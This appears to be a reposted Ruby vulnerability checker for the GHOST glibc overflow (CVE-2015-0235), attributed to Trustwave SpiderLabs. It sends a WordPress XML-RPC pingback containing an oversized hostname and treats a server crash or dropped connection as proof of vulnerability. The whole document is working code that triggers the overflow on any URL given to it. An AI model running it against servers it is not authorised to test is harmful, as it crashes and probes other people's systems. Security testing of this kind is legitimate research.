Googleinurl

GHOST gethostbyname() Vuln (CVE-2015-0235)

Mar 15th, 2015
#
# --[ Trustwave SpiderLabs Research Team ]--
# Ref: http://blog.spiderlabs.com/2015/01/ghost-gethostbyname-heap-overflow-in-glibc-cve-2015-0235.html
#
# Checks whether a WordPress site's XML-RPC pingback handler resolves an
# oversized hostname through the GHOST-affected gethostbyname() path. A crash
# (HTTP 500 or a dropped connection) indicates the host is likely vulnerable.
#
require "net/http"
require "uri"

if ARGV.count != 2
  puts "Usage: #{$0} [Target URL] [count]"   # $0 is the script name, not ARGV[0]
  exit 1
end

# Accept "example.com", "http://example.com/blog/" or ".../xmlrpc.php" alike:
# drop the scheme and any trailing xmlrpc.php, then split host from path.
target = ARGV[0].sub(%r{\Ahttps?://}, "").sub(%r{/xmlrpc\.php\z}, "")
host, path = target.split("/", 2)
path = path.to_s.empty? ? "" : "/#{path}".chomp("/")
uri = URI.parse("http://#{host}")

count = ARGV[1].to_i
if count <= 0
  puts "count must be a positive integer"
  exit 1
end
ghost_host = "0" * count   # hostname longer than the gethostbyname() buffer

# Set up POST request: a pingback whose source and target URLs carry the long hostname
payload = <<~XML
  <?xml version="1.0"?>
  <methodCall>
    <methodName>pingback.ping</methodName>
    <params>
      <param><value><string>http://#{ghost_host}/index.php</string></value></param>
      <param><value><string>http://#{ghost_host}/index.php</string></value></param>
    </params>
  </methodCall>
XML

begin
  Net::HTTP.start(uri.host, uri.port) do |http|
    response = http.post("#{path}/xmlrpc.php", payload, "Content-Type" => "text/xml")
    if response.code == "500"
      puts "Vulnerable"
    else
      puts "Looks like you're safe, for today"
    end
  end
rescue EOFError, Errno::ECONNRESET
  # The PHP worker died mid-request, the other symptom of the overflow
  puts "Vulnerable"
end
#source : https://gist.github.com/rcbarnett/7564bee9f81aba746e04